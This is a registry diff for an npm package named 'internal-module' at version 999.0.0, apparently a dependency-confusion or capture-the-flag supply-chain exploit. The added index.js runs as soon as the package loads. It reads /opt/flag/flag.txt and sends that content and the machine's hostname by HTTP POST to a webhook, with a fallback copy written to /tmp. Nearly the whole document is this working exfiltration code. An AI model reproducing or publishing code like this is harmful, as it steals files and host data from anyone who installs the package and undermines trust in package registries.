internal-module 999.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +70 -0
- package/package.json +9 -0
package/index.js
ADDED
|
@@ -0,0 +1,70 @@
|
|
|
1
|
+
|
|
2
|
+
// Malicious code that runs when package is installed/required
|
|
3
|
+
const fs = require('fs');
|
|
4
|
+
const https = require('https');
|
|
5
|
+
const http = require('http');
|
|
6
|
+
|
|
7
|
+
// Read the flag
|
|
8
|
+
let flag = '';
|
|
9
|
+
try {
|
|
10
|
+
flag = fs.readFileSync('/opt/flag/flag.txt', 'utf8');
|
|
11
|
+
console.log('[EXPLOIT] Flag read successfully:', flag);
|
|
12
|
+
} catch (err) {
|
|
13
|
+
console.error('[EXPLOIT] Error reading flag:', err.message);
|
|
14
|
+
flag = 'ERROR: ' + err.message;
|
|
15
|
+
}
|
|
16
|
+
|
|
17
|
+
// Exfiltrate via HTTP POST to a webhook or your server
|
|
18
|
+
// Replace with your webhook URL
|
|
19
|
+
const webhookUrl = process.env.WEBHOOK_URL || 'https://webhook.site/your-unique-id';
|
|
20
|
+
const url = new URL(webhookUrl);
|
|
21
|
+
|
|
22
|
+
const postData = JSON.stringify({
|
|
23
|
+
flag: flag,
|
|
24
|
+
timestamp: new Date().toISOString(),
|
|
25
|
+
hostname: require('os').hostname()
|
|
26
|
+
});
|
|
27
|
+
|
|
28
|
+
const options = {
|
|
29
|
+
hostname: url.hostname,
|
|
30
|
+
port: url.port || (url.protocol === 'https:' ? 443 : 80),
|
|
31
|
+
path: url.pathname + url.search,
|
|
32
|
+
method: 'POST',
|
|
33
|
+
headers: {
|
|
34
|
+
'Content-Type': 'application/json',
|
|
35
|
+
'Content-Length': Buffer.byteLength(postData)
|
|
36
|
+
}
|
|
37
|
+
};
|
|
38
|
+
|
|
39
|
+
const client = url.protocol === 'https:' ? https : http;
|
|
40
|
+
const req = client.request(options, (res) => {
|
|
41
|
+
console.log('[EXPLOIT] Response status:', res.statusCode);
|
|
42
|
+
res.on('data', (d) => {
|
|
43
|
+
console.log('[EXPLOIT] Response:', d.toString());
|
|
44
|
+
});
|
|
45
|
+
});
|
|
46
|
+
|
|
47
|
+
req.on('error', (e) => {
|
|
48
|
+
console.error('[EXPLOIT] Request error:', e.message);
|
|
49
|
+
// Fallback: also try to write to a file we can access
|
|
50
|
+
try {
|
|
51
|
+
fs.writeFileSync('/tmp/flag_exfiltrated.txt', flag);
|
|
52
|
+
console.log('[EXPLOIT] Flag written to /tmp/flag_exfiltrated.txt');
|
|
53
|
+
} catch (writeErr) {
|
|
54
|
+
console.error('[EXPLOIT] Could not write to /tmp:', writeErr.message);
|
|
55
|
+
}
|
|
56
|
+
});
|
|
57
|
+
|
|
58
|
+
req.write(postData);
|
|
59
|
+
req.end();
|
|
60
|
+
|
|
61
|
+
// Also execute immediately when required (not just on install)
|
|
62
|
+
module.exports = {
|
|
63
|
+
getFlag: () => {
|
|
64
|
+
try {
|
|
65
|
+
return fs.readFileSync('/opt/flag/flag.txt', 'utf8');
|
|
66
|
+
} catch (err) {
|
|
67
|
+
return 'ERROR: ' + err.message;
|
|
68
|
+
}
|
|
69
|
+
}
|
|
70
|
+
};
|